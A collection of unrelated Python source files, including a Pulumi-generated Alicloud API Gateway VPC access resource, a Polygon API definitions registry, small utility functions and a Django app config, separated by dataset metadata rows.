The name of the vpc authorization.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def port(self) -> Optional[pulumi.Input[int]]:
"""
ID of the port corresponding to the instance.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "port", value)
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> Optional[pulumi.Input[str]]:
"""
The vpc id of the vpc authorization.
"""
return pulumi.get(self, "vpc_id")
@vpc_id.setter
def vpc_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_id", value)
class VpcAccess(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
## Import
Api gateway app can be imported using the id, e.g.
```sh
$ pulumi import alicloud:apigateway/vpcAccess:VpcAccess example "APiGatewayVpc:vpc-aswcj19ajsz:i-ajdjfsdlf:8080"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] instance_id: ID of the instance in VPC (ECS/Server Load Balance).
:param pulumi.Input[str] name: The name of the vpc authorization.
:param pulumi.Input[int] port: ID of the port corresponding to the instance.
:param pulumi.Input[str] vpc_id: The vpc id of the vpc authorization.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VpcAccessArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
## Import
Api gateway app can be imported using the id, e.g.
```sh
$ pulumi import alicloud:apigateway/vpcAccess:VpcAccess example "APiGatewayVpc:vpc-aswcj19ajsz:i-ajdjfsdlf:8080"
```
:param str resource_name: The name of the resource.
:param VpcAccessArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VpcAccessArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
instance_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VpcAccessArgs.__new__(VpcAccessArgs)
if instance_id is None and not opts.urn:
raise TypeError("Missing required property 'instance_id'")
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["name"] = name
if port is None and not opts.urn:
raise TypeError("Missing required property 'port'")
__props__.__dict__["port"] = port
if vpc_id is None and not opts.urn:
raise TypeError("Missing required property 'vpc_id'")
__props__.__dict__["vpc_id"] = vpc_id
super(VpcAccess, __self__).__init__(
'alicloud:apigateway/vpcAccess:VpcAccess',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
instance_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
vpc_id: Optional[pulumi.Input[str]] = None) -> 'VpcAccess':
"""
Get an existing VpcAccess resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] instance_id: ID of the instance in VPC (ECS/Server Load Balance).
:param pulumi.Input[str] name: The name of the vpc authorization.
:param pulumi.Input[int] port: ID of the port corresponding to the instance.
:param pulumi.Input[str] vpc_id: The vpc id of the vpc authorization.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VpcAccessState.__new__(_VpcAccessState)
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["name"] = name
__props__.__dict__["port"] = port
__props__.__dict__["vpc_id"] = vpc_id
return VpcAccess(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Output[str]:
"""
ID of the instance in VPC (ECS/Server Load Balance).
"""
return pulumi.get(self, "instance_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the vpc authorization.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
ID of the port corresponding to the instance.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="vpcId")
def vpc_id(self) -> pulumi.Output[str]:
"""
The vpc id of the vpc authorization.
"""
return pulumi.get(self, "vpc_id")
| 37.131579 | 134 | 0.61118 | 1,362 | 11,288 | 4.84141 | 0.110132 | 0.093418 | 0.087049 | 0.070064 | 0.751896 | 0.716106 | 0.691386 | 0.648165 | 0.640431 | 0.62663 | 0 | 0.001601 | 0.280829 | 11,288 | 303 | 135 | 37.254125 | 0.810668 | 0.271793 | 0 | 0.602273 | 1 | 0 | 0.079619 | 0.005158 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153409 | false | 0.005682 | 0.028409 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
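A minimal provisioning sketch for the generated VpcAccess resource above, intended to run inside a Pulumi program; the instance, port and VPC identifiers are placeholders.

import pulumi_alicloud as alicloud

# Placeholder identifiers; substitute a real ECS/SLB instance id, port and VPC id.
example = alicloud.apigateway.VpcAccess(
    "exampleVpcAccess",
    name="example-vpc-authorization",
    instance_id="i-xxxxxxxxxxxx",
    port=8080,
    vpc_id="vpc-xxxxxxxxxxxx",
)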
6a4f45597597bd19a6b6e1eddcb0eec72e2d136f | 11,318 | py | Python | polygon/library.py | rayeef/polygon | b69d614c8f1d83bc0b07ea705fa781441a70fc9a | [
"Apache-2.0"
] | null | null | null | polygon/library.py | rayeef/polygon | b69d614c8f1d83bc0b07ea705fa781441a70fc9a | [
"Apache-2.0"
] | null | null | null | polygon/library.py | rayeef/polygon | b69d614c8f1d83bc0b07ea705fa781441a70fc9a | [
"Apache-2.0"
] | null | null | null | from definitions import LastTrade
from definitions import LastQuote
from definitions import HistTrade
from definitions import Quote
from definitions import Aggregate
from definitions import Company
from definitions import CompanyV3
from definitions import Address
from definitions import Symbol
from definitions import SymbolV3
from definitions import Dividend
from definitions import News
from definitions import NewsV2
from definitions import Publisher
from definitions import Earning
from definitions import Financial
from definitions import Exchange
from definitions import Error
from definitions import NotFound
from definitions import Conflict
from definitions import Unauthorized
from definitions import MarketStatus
from definitions import MarketHoliday
from definitions import AnalystRatings
from definitions import RatingSection
from definitions import CryptoTick
from definitions import CryptoTickJson
from definitions import CryptoExchange
from definitions import CryptoSnapshotTicker
from definitions import CryptoSnapshotBookItem
from definitions import CryptoSnapshotTickerBook
from definitions import CryptoSnapshotAgg
from definitions import Forex
from definitions import LastForexTrade
from definitions import LastForexQuote
from definitions import ForexAggregate
from definitions import ForexSnapshotTicker
from definitions import ForexSnapshotAgg
from definitions import Ticker
from definitions import Split
from definitions import Financials
from definitions import Trade
from definitions import StocksSnapshotTicker
from definitions import StocksSnapshotBookItem
from definitions import StocksSnapshotTickerBook
from definitions import StocksV2Trade
from definitions import StocksV2NBBO
from definitions import StocksSnapshotAgg
from definitions import StocksSnapshotQuote
from definitions import Aggv2
from definitions import AggResponse
from definitions import ReferenceTickersApiResponse
from definitions import ReferenceTickersV3ApiResponse
from definitions import ReferenceTickerTypesApiResponse
from definitions import ReferenceTickerDetailsApiResponse
from definitions import ReferenceTickerDetailsV3ApiResponse
from definitions import ReferenceTickerNewsApiResponse
from definitions import ReferenceTickerNewsV2ApiResponse
from definitions import ReferenceMarketsApiResponse
from definitions import ReferenceLocalesApiResponse
from definitions import ReferenceStockSplitsApiResponse
from definitions import ReferenceStockDividendsApiResponse
from definitions import ReferenceStockFinancialsApiResponse
from definitions import ReferenceMarketStatusApiResponse
from definitions import ReferenceMarketHolidaysApiResponse
from definitions import StocksEquitiesExchangesApiResponse
from definitions import StocksEquitiesHistoricTradesApiResponse
from definitions import HistoricTradesV2ApiResponse
from definitions import StocksEquitiesHistoricQuotesApiResponse
from definitions import HistoricNBboQuotesV2ApiResponse
from definitions import StocksEquitiesLastTradeForASymbolApiResponse
from definitions import StocksEquitiesLastQuoteForASymbolApiResponse
from definitions import StocksEquitiesDailyOpenCloseApiResponse
from definitions import StocksEquitiesConditionMappingsApiResponse
from definitions import StocksEquitiesSnapshotAllTickersApiResponse
from definitions import StocksEquitiesSnapshotSingleTickerApiResponse
from definitions import StocksEquitiesSnapshotGainersLosersApiResponse
from definitions import StocksEquitiesPreviousCloseApiResponse
from definitions import StocksEquitiesAggregatesApiResponse
from definitions import StocksEquitiesGroupedDailyApiResponse
from definitions import ForexCurrenciesHistoricForexTicksApiResponse
from definitions import ForexCurrenciesRealTimeCurrencyConversionApiResponse
from definitions import ForexCurrenciesLastQuoteForACurrencyPairApiResponse
from definitions import ForexCurrenciesGroupedDailyApiResponse
from definitions import ForexCurrenciesPreviousCloseApiResponse
from definitions import ForexCurrenciesSnapshotAllTickersApiResponse
from definitions import ForexCurrenciesSnapshotSingleTickerApiResponse
from definitions import ForexCurrenciesSnapshotGainersLosersApiResponse
from definitions import CryptoCryptoExchangesApiResponse
from definitions import CryptoLastTradeForACryptoPairApiResponse
from definitions import CryptoDailyOpenCloseApiResponse
from definitions import CryptoHistoricCryptoTradesApiResponse
from definitions import CryptoGroupedDailyApiResponse
from definitions import CryptoPreviousCloseApiResponse
from definitions import CryptoSnapshotAllTickersApiResponse
from definitions import CryptoSnapshotSingleTickerApiResponse
from definitions import CryptoSnapshotSingleTickerFullBookApiResponse
from definitions import CryptoSnapshotGainersLosersApiResponse
from definitions import CurrenciesAggregatesApiResponse
from definitions import StockSymbol
from definitions import ConditionTypeMap
from definitions import SymbolTypeMap
from definitions import TickerSymbol
import typing
from definitions import Definition
AnyDefinition = typing.TypeVar("AnyDefinition", bound=Definition)
# noinspection SpellCheckingInspection
name_to_class: typing.Dict[str, typing.Callable[[], typing.Type[AnyDefinition]]] = {
"LastTrade": LastTrade,
"LastQuote": LastQuote,
"HistTrade": HistTrade,
"Quote": Quote,
"Aggregate": Aggregate,
"Company": Company,
"CompanyV3": CompanyV3,
"Address": Address,
"Symbol": Symbol,
"Dividend": Dividend,
"News": News,
"NewsV2": NewsV2,
"Publisher": Publisher,
"Earning": Earning,
"Financial": Financial,
"Exchange": Exchange,
"Error": Error,
"NotFound": NotFound,
"Conflict": Conflict,
"Unauthorized": Unauthorized,
"MarketStatus": MarketStatus,
"MarketHoliday": MarketHoliday,
"AnalystRatings": AnalystRatings,
"RatingSection": RatingSection,
"CryptoTick": CryptoTick,
"CryptoTickJson": CryptoTickJson,
"CryptoExchange": CryptoExchange,
"CryptoSnapshotTicker": CryptoSnapshotTicker,
"CryptoSnapshotBookItem": CryptoSnapshotBookItem,
"CryptoSnapshotTickerBook": CryptoSnapshotTickerBook,
"CryptoSnapshotAgg": CryptoSnapshotAgg,
"Forex": Forex,
"LastForexTrade": LastForexTrade,
"LastForexQuote": LastForexQuote,
"ForexAggregate": ForexAggregate,
"ForexSnapshotTicker": ForexSnapshotTicker,
"ForexSnapshotAgg": ForexSnapshotAgg,
"Ticker": Ticker,
"Split": Split,
"Financials": Financials,
"Trade": Trade,
"StocksSnapshotTicker": StocksSnapshotTicker,
"StocksSnapshotBookItem": StocksSnapshotBookItem,
"StocksSnapshotTickerBook": StocksSnapshotTickerBook,
"StocksV2Trade": StocksV2Trade,
"StocksV2NBBO": StocksV2NBBO,
"StocksSnapshotAgg": StocksSnapshotAgg,
"StocksSnapshotQuote": StocksSnapshotQuote,
"Aggv2": Aggv2,
"AggResponse": AggResponse,
"ReferenceTickersApiResponse": ReferenceTickersApiResponse,
"ReferenceTickersV3ApiResponse": ReferenceTickersV3ApiResponse,
"ReferenceTickerTypesApiResponse": ReferenceTickerTypesApiResponse,
"ReferenceTickerDetailsApiResponse": ReferenceTickerDetailsApiResponse,
"ReferenceTickerDetailsV3ApiResponse": ReferenceTickerDetailsV3ApiResponse,
"ReferenceTickerNewsApiResponse": ReferenceTickerNewsApiResponse,
"ReferenceTickerNewsV2ApiResponse": ReferenceTickerNewsV2ApiResponse,
"ReferenceMarketsApiResponse": ReferenceMarketsApiResponse,
"ReferenceLocalesApiResponse": ReferenceLocalesApiResponse,
"ReferenceStockSplitsApiResponse": ReferenceStockSplitsApiResponse,
"ReferenceStockDividendsApiResponse": ReferenceStockDividendsApiResponse,
"ReferenceStockFinancialsApiResponse": ReferenceStockFinancialsApiResponse,
"ReferenceMarketStatusApiResponse": ReferenceMarketStatusApiResponse,
"ReferenceMarketHolidaysApiResponse": ReferenceMarketHolidaysApiResponse,
"StocksEquitiesExchangesApiResponse": StocksEquitiesExchangesApiResponse,
"StocksEquitiesHistoricTradesApiResponse": StocksEquitiesHistoricTradesApiResponse,
"HistoricTradesV2ApiResponse": HistoricTradesV2ApiResponse,
"StocksEquitiesHistoricQuotesApiResponse": StocksEquitiesHistoricQuotesApiResponse,
"HistoricNBboQuotesV2ApiResponse": HistoricNBboQuotesV2ApiResponse,
"StocksEquitiesLastTradeForASymbolApiResponse": StocksEquitiesLastTradeForASymbolApiResponse,
"StocksEquitiesLastQuoteForASymbolApiResponse": StocksEquitiesLastQuoteForASymbolApiResponse,
"StocksEquitiesDailyOpenCloseApiResponse": StocksEquitiesDailyOpenCloseApiResponse,
"StocksEquitiesConditionMappingsApiResponse": StocksEquitiesConditionMappingsApiResponse,
"StocksEquitiesSnapshotAllTickersApiResponse": StocksEquitiesSnapshotAllTickersApiResponse,
"StocksEquitiesSnapshotSingleTickerApiResponse": StocksEquitiesSnapshotSingleTickerApiResponse,
"StocksEquitiesSnapshotGainersLosersApiResponse": StocksEquitiesSnapshotGainersLosersApiResponse,
"StocksEquitiesPreviousCloseApiResponse": StocksEquitiesPreviousCloseApiResponse,
"StocksEquitiesAggregatesApiResponse": StocksEquitiesAggregatesApiResponse,
"StocksEquitiesGroupedDailyApiResponse": StocksEquitiesGroupedDailyApiResponse,
"ForexCurrenciesHistoricForexTicksApiResponse": ForexCurrenciesHistoricForexTicksApiResponse,
"ForexCurrenciesRealTimeCurrencyConversionApiResponse": ForexCurrenciesRealTimeCurrencyConversionApiResponse,
"ForexCurrenciesLastQuoteForACurrencyPairApiResponse": ForexCurrenciesLastQuoteForACurrencyPairApiResponse,
"ForexCurrenciesGroupedDailyApiResponse": ForexCurrenciesGroupedDailyApiResponse,
"ForexCurrenciesPreviousCloseApiResponse": ForexCurrenciesPreviousCloseApiResponse,
"ForexCurrenciesSnapshotAllTickersApiResponse": ForexCurrenciesSnapshotAllTickersApiResponse,
"ForexCurrenciesSnapshotSingleTickerApiResponse": ForexCurrenciesSnapshotSingleTickerApiResponse,
"ForexCurrenciesSnapshotGainersLosersApiResponse": ForexCurrenciesSnapshotGainersLosersApiResponse,
"CryptoCryptoExchangesApiResponse": CryptoCryptoExchangesApiResponse,
"CryptoLastTradeForACryptoPairApiResponse": CryptoLastTradeForACryptoPairApiResponse,
"CryptoDailyOpenCloseApiResponse": CryptoDailyOpenCloseApiResponse,
"CryptoHistoricCryptoTradesApiResponse": CryptoHistoricCryptoTradesApiResponse,
"CryptoGroupedDailyApiResponse": CryptoGroupedDailyApiResponse,
"CryptoPreviousCloseApiResponse": CryptoPreviousCloseApiResponse,
"CryptoSnapshotAllTickersApiResponse": CryptoSnapshotAllTickersApiResponse,
"CryptoSnapshotSingleTickerApiResponse": CryptoSnapshotSingleTickerApiResponse,
"CryptoSnapshotSingleTickerFullBookApiResponse": CryptoSnapshotSingleTickerFullBookApiResponse,
"CryptoSnapshotGainersLosersApiResponse": CryptoSnapshotGainersLosersApiResponse,
"CurrenciesAggregatesApiResponse": CurrenciesAggregatesApiResponse,
}
# noinspection SpellCheckingInspection
name_to_type = {
"StockSymbol": StockSymbol,
"ConditionTypeMap": ConditionTypeMap,
"SymbolTypeMap": SymbolTypeMap,
"TickerSymbol": TickerSymbol,
} | 50.981982 | 114 | 0.848295 | 646 | 11,318 | 14.856037 | 0.185759 | 0.162551 | 0.227571 | 0.008544 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003088 | 0.113006 | 11,318 | 222 | 115 | 50.981982 | 0.952884 | 0.00645 | 0 | 0 | 0 | 0 | 0.218563 | 0.168572 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.495283 | 0 | 0.495283 | 0 | 0 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
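A lookup sketch for the two registries above; the import path is assumed from the file location (polygon/library.py), and because the keyword arguments each resolved Definition accepts depend on its schema, only the dictionary lookups are shown.

from polygon.library import name_to_class, name_to_type  # import path assumed from the file location

# Resolve a Definition subclass by its schema name...
last_trade_cls = name_to_class["LastTrade"]
print(last_trade_cls)

# ...and a plain type alias the same way.
print(name_to_type["StockSymbol"])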
6a71cd9a3a4a72b42c9c16579ec0689070b5b326 | 170 | py | Python | utils/convert_datetime.py | huynhminhtruong/py | 6f90423a62103b2bd28daa0d5a27b4a25bc318c8 | [
"MIT"
] | null | null | null | utils/convert_datetime.py | huynhminhtruong/py | 6f90423a62103b2bd28daa0d5a27b4a25bc318c8 | [
"MIT"
] | null | null | null | utils/convert_datetime.py | huynhminhtruong/py | 6f90423a62103b2bd28daa0d5a27b4a25bc318c8 | [
"MIT"
] | null | null | null | import datetime as dt
date_time_str = '2019-11-04T12:12:51Z'
date_time_obj = dt.datetime.strptime(date_time_str, '%Y-%m-%dT%H:%M:%SZ')
print(date_time_obj.timestamp()) | 24.285714 | 73 | 0.741176 | 32 | 170 | 3.6875 | 0.625 | 0.271186 | 0.186441 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.089744 | 0.082353 | 170 | 7 | 74 | 24.285714 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6a7c7c04c0b9e8643f9cb05da0c380ed19234a92 | 370 | py | Python | funboost/utils/dependency_packages/mongomq/utils.py | DJMIN/funboost | 7570ca2909bb0b44a1080f5f98aa96c86d3da9d4 | [
"Apache-2.0"
] | 333 | 2019-08-08T10:25:27.000Z | 2022-03-30T07:32:04.000Z | funboost/utils/dependency_packages/mongomq/utils.py | mooti-barry/funboost | 2cd9530e2c4e5a52fc921070d243d402adbc3a0e | [
"Apache-2.0"
] | 38 | 2020-04-24T01:47:51.000Z | 2021-12-20T07:22:15.000Z | funboost/utils/dependency_packages/mongomq/utils.py | mooti-barry/funboost | 2cd9530e2c4e5a52fc921070d243d402adbc3a0e | [
"Apache-2.0"
] | 84 | 2019-08-09T11:51:14.000Z | 2022-03-02T06:29:09.000Z | def enum(name, *sequential, **named):
values = dict(zip(sequential, range(len(sequential))), **named)
# NOTE: Yes, we *really* want to cast using str() here.
# On Python 2 type() requires a byte string (which is str() on Python 2).
# On Python 3 it does not matter, so we'll use str(), which acts as
# a no-op.
return type(str(name), (), values) | 46.25 | 77 | 0.635135 | 60 | 370 | 3.916667 | 0.716667 | 0.102128 | 0.076596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010381 | 0.218919 | 370 | 8 | 78 | 46.25 | 0.802768 | 0.540541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
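A quick usage sketch for the enum helper above: sequential names are numbered from zero and keyword names keep their explicit values; the import path is assumed from the file location.

from funboost.utils.dependency_packages.mongomq.utils import enum  # path assumed from the file location

# Sequential members get 0, 1, 2, ...; named members keep the given value.
Priority = enum("Priority", "LOW", "NORMAL", "HIGH", URGENT=10)
print(Priority.LOW, Priority.NORMAL, Priority.HIGH, Priority.URGENT)  # 0 1 2 10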
6a91c867376436aedff1c1b17719fe89d54add01 | 194 | py | Python | resdk/shortcuts/__init__.py | tristanbrown/resolwe-bio-py | c911defde8a5e7e902ad1adf4f9e480f17002c18 | [
"Apache-2.0"
] | 4 | 2016-09-28T16:00:05.000Z | 2018-08-16T16:14:10.000Z | resdk/shortcuts/__init__.py | tristanbrown/resolwe-bio-py | c911defde8a5e7e902ad1adf4f9e480f17002c18 | [
"Apache-2.0"
] | 229 | 2016-03-28T19:41:00.000Z | 2022-03-16T15:02:15.000Z | resdk/shortcuts/__init__.py | tristanbrown/resolwe-bio-py | c911defde8a5e7e902ad1adf4f9e480f17002c18 | [
"Apache-2.0"
] | 18 | 2016-03-10T16:11:57.000Z | 2021-06-01T10:01:49.000Z | """.. Ignore pydocstyle D400.
=========
Shortcuts
=========
Shortcut mixin classes
======================
.. autoclass:: resdk.shortcuts.collection.CollectionRelationsMixin
:members:
"""
| 13.857143 | 66 | 0.582474 | 13 | 194 | 8.692308 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017544 | 0.118557 | 194 | 13 | 67 | 14.923077 | 0.643275 | 0.953608 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6a9a56b22b45a784db590179a8a9211729bf5133 | 50 | py | Python | env/Lib/site-packages/frccontrol/version.py | DiMino-0/Rapid-React-2022-Team810 | 05c61453fce7d9762b119dce4326bbdb1cb8688b | [
"BSD-3-Clause"
] | null | null | null | env/Lib/site-packages/frccontrol/version.py | DiMino-0/Rapid-React-2022-Team810 | 05c61453fce7d9762b119dce4326bbdb1cb8688b | [
"BSD-3-Clause"
] | 5 | 2022-02-13T14:38:04.000Z | 2022-02-15T00:13:07.000Z | env/Lib/site-packages/frccontrol/version.py | DiMino-0/Rapid-React-2022-Team810 | 05c61453fce7d9762b119dce4326bbdb1cb8688b | [
"BSD-3-Clause"
] | 4 | 2022-02-04T22:58:27.000Z | 2022-02-14T19:29:18.000Z | # Autogenerated by setup.py
__version__ = "2022.9" | 25 | 27 | 0.76 | 7 | 50 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.113636 | 0.12 | 50 | 2 | 28 | 25 | 0.659091 | 0.5 | 0 | 0 | 1 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
6aa102af37c99a906bbbf0f58ec1ef62d9b40076 | 378 | py | Python | src/pyglue/DocStrings/ExceptionMissingFile.py | omenos/OpenColorIO | 7316c3be20752278924dd3f213bff297ffb63a14 | [
"BSD-3-Clause"
] | 7 | 2015-07-01T03:19:43.000Z | 2021-03-27T11:02:16.000Z | src/pyglue/DocStrings/ExceptionMissingFile.py | dictoon/OpenColorIO | 64adcad300adfd166280d2e7b1fb5c3ce7dca482 | [
"BSD-3-Clause"
] | null | null | null | src/pyglue/DocStrings/ExceptionMissingFile.py | dictoon/OpenColorIO | 64adcad300adfd166280d2e7b1fb5c3ce7dca482 | [
"BSD-3-Clause"
] | 2 | 2019-03-05T20:43:59.000Z | 2019-11-11T20:35:55.000Z |
class ExceptionMissingFile:
"""
An exception class for errors detected at runtime, thrown when OCIO cannot
find a file that is expected to exist. This is provided as a custom type to
distinguish cases where one wants to continue looking for missing files,
but wants to properly fail for other error conditions.
"""
def __init__(self):
pass
| 31.5 | 79 | 0.716931 | 54 | 378 | 4.944444 | 0.833333 | 0.052434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246032 | 378 | 11 | 80 | 34.363636 | 0.936842 | 0.73545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0.333333 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
6aacdfa486708ed8b617784dc9cd04599014bd8e | 251 | py | Python | WEEKS/CD_Sata-Structures/general/practice/PYTHON/37 - arrayMaxConsecutiveSum.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/general/practice/PYTHON/37 - arrayMaxConsecutiveSum.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/general/practice/PYTHON/37 - arrayMaxConsecutiveSum.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | def arrayMaxConsecutiveSum(inputArray, k):
arr = [sum(inputArray[:k])]
for i in range(1, len(inputArray) - (k - 1)):
arr.append(arr[i - 1] - inputArray[i - 1] + inputArray[i + k - 1])
sort_arr = sorted(arr)
return sort_arr[-1]
| 35.857143 | 74 | 0.601594 | 37 | 251 | 4.027027 | 0.432432 | 0.221477 | 0.161074 | 0.174497 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030928 | 0.227092 | 251 | 6 | 75 | 41.833333 | 0.737113 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
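A quick check of the sliding-window function above; max(arr) would give the same result without the final sort.

# Windows of size 2 over [2, 3, 5, 1, 6] sum to 5, 8, 6, 7, so the maximum is 8.
print(arrayMaxConsecutiveSum([2, 3, 5, 1, 6], 2))  # 8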
6ad298a145a3e0b10594c4465cca34f885db1f68 | 147 | py | Python | mah_tags/apps.py | mahbd/brur-payment | cb9812e1d2f8c22c7015708ca9bb4fc05bfb1452 | [
"MIT"
] | null | null | null | mah_tags/apps.py | mahbd/brur-payment | cb9812e1d2f8c22c7015708ca9bb4fc05bfb1452 | [
"MIT"
] | null | null | null | mah_tags/apps.py | mahbd/brur-payment | cb9812e1d2f8c22c7015708ca9bb4fc05bfb1452 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class MahTagsConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'mah_tags'
